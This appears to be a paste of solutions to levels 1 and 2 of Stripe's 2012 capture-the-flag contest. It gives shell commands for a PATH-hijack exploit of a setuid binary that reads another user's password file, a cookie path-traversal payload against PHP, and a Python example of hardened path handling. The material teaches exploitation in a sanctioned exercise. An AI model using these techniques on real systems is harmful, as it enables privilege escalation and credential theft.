Stripe's Capture the Flag Solutions

a guest
Feb 23rd, 2012
Stripe "Capture the Flag" - SOLUTIONS

Solution for the first two levels.

Disclaimer: if you need to read this to solve either of the first two levels, you obviously do not have enough skills to solve many, if any, of the future levels. And you're definitely not going to be the first one to capture the final flag.

If you enjoy a challenge, stop reading now ... !

...

still here?

...

okay, let's roll ...


Level 01

This level exploits a setuid program. If you look at the source provided, you'll see the C code runs "date" through a system() call, and system() resolves the command the way the shell does: by searching the directories in the PATH environment variable. The program we're going to execute runs as level02, so we need to get it to output level02's password.

Let's create our own "date" executable, then change the PATH variable so that our copy is found first, before the system "date" executable.

> ssh level01@ctf.stri.pe
(enter the provided password)

> mkdir /tmp/pwn-level-one-1234rand
> cd /tmp/pwn-level-one-1234rand
> vi date

Set the contents of date to:
cat /home/level02/.password

> chmod +x date
> PATH=/tmp/pwn-level-one-1234rand:$PATH
> export PATH

Now we run the program that's setuid as level02:
> /levels/level01

It should output Level 2's password! If not, you did something wrong.

Level 02

This one's even easier than the first one, if you're familiar with PHP & cookies. NOM NOM NOM

Log in as the level02 user using the password you obtained from the level01 sploit.

Visit:

http://ctf.stri.pe/level02.php

Enter the level02 credentials.

Back in ssh:

> cat /var/www/level02.php

Notice this line:

$out = file_get_contents('/tmp/level02/'.$_COOKIE['user_details']);

It gets executed if the cookie is already set.

See the problem here?

Cookies are stored client-side, so they can be fussed with, and here the cookie value is concatenated onto the directory path with no validation at all. What if we changed the cookie to, oh, say ... "=../../etc/passwd" ?

Note: you need the leading "=" for the cookie to be formatted properly.

Using your favorite cookie editor (Chrome, Firefox, whatever), set the "user_details" cookie to:
=../../home/level03/.password


And re-submit the form. You should have your Level 3 password by now.
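
The whole of Level 02 comes down to that one unvalidated concatenation. As an added example (not from this paste and not Stripe's CTF code), here is the check the PHP line is missing, written in Python so it can be run stand-alone: the unchanged concatenation beside a hardened version that allowlists the cookie value and confirms the normalized path stays under /tmp/level02. The SAFE_NAME pattern and the sample cookie values are assumptions.

```python
import posixpath
import re

# Directory that the level02.php line quoted above reads from.
BASE_DIR = "/tmp/level02"

# Assumed allowlist: the application names the files it writes here, so a
# cookie value is only acceptable if it looks like such a name. Adjust the
# pattern to whatever the real application actually generates.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def vulnerable_path(cookie_value: str) -> str:
    """The paste's concatenation, unchanged: the cookie is trusted blindly."""
    return BASE_DIR + "/" + cookie_value


def contained_in(base_dir: str, path: str) -> bool:
    """True only if the normalized path stays inside base_dir.

    Pure string logic (no filesystem access) so it runs anywhere; a real
    deployment should also realpath() the result to defeat symlinks.
    """
    base = posixpath.normpath(base_dir)
    norm = posixpath.normpath(path)
    return norm == base or norm.startswith(base + "/")


def hardened_path(cookie_value: str):
    """Return the path to read, or None if the cookie must be rejected."""
    # Reject NUL bytes and anything outside the allowlist before touching paths.
    if "\x00" in cookie_value or not SAFE_NAME.fullmatch(cookie_value):
        return None
    candidate = vulnerable_path(cookie_value)
    # Defence in depth: the allowlist already excludes "..", but the
    # containment check stays so a later, looser pattern cannot reopen the hole.
    if not contained_in(BASE_DIR, candidate):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample cookie values: one legitimate, one traversal attempt.
    for value in ("a1b2c3", "../../home/level03/.password"):
        print(f"{value!r}: vulnerable -> {vulnerable_path(value)}")
        print(f"{value!r}: hardened   -> {hardened_path(value)}")
```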


Aaaand that's all, folks.

I'll leave the higher levels' sploits to the real hackers out there.